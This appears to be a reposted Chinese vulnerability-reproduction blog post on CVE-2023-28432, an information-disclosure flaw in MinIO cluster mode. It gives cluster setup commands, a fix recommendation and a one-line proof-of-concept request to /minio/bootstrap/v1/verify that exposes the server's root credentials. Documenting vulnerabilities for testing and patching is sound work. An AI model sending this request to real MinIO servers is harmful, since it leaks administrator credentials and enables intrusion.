MinIO(集群模式)信息泄露漏洞(CVE-2023-28432)

admin 2024年8月9日14:04:22评论60 views字数 872阅读2分54秒阅读模式

0X01 简介

MinIO 提供高性能、与S3 兼容的对象存储系统,让你自己能够构建自己的私有云储存服务。

官网:
https://www.minio.org.cn/
漏洞编号:
CVE-2023-28432

影响范围:

RELEASE.2019-12-17T23-16-33Z <= MinIO < RELEASE.2023-03-20T20-16-18Z

测试环境:

MinIO.RELEASE.2021-10-08T23-58-24Z
Ubuntu-22.04.1

0X02 环境搭建

export MINIO_ROOT_USER=admin           #账号export MINIO_ROOT_PASSWORD=12345678    #密码MINIO_HOME=/tmp                        #启动文件路径MINIO_HOST=192.168.245.135             #本机IP

for i in {01..04};  do    nohup ${MINIO_HOME}/minio server --address ":90${i}" --console-address ":500${i}" http://${MINIO_HOST}:9001/mnt/data01 http://${MINIO_HOST}:9002/mnt/data02 http://${MINIO_HOST}:9003/mnt/data03 http://${MINIO_HOST}:9004/mnt/data04 > ${MINIO_HOME}/minio:90${i}.log 2>&1 &  done
【漏洞复现】MinIO(集群模式)信息泄露漏洞(CVE-2023-28432)
API地址:http://192.168.245.135:9001-9004(访问API地址会跳转至后台)后台地址:http://192.168.245.135:50001-50004
【漏洞复现】MinIO(集群模式)信息泄露漏洞(CVE-2023-28432)

0X03 漏洞复现

POC:

POST /minio/bootstrap/v1/verify HTTP/1.1Host: 192.168.245.135:9001(漏洞在API地址)
【漏洞复现】MinIO(集群模式)信息泄露漏洞(CVE-2023-28432)
【漏洞复现】MinIO(集群模式)信息泄露漏洞(CVE-2023-28432)

0X04 修复建议

更新至最新版。

原文始发于微信公众号(皓月的笔记本):【漏洞复现】MinIO(集群模式)信息泄露漏洞(CVE-2023-28432)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月9日14:04:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   MinIO(集群模式)信息泄露漏洞(CVE-2023-28432)https://cn-sec.com/archives/2007143.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息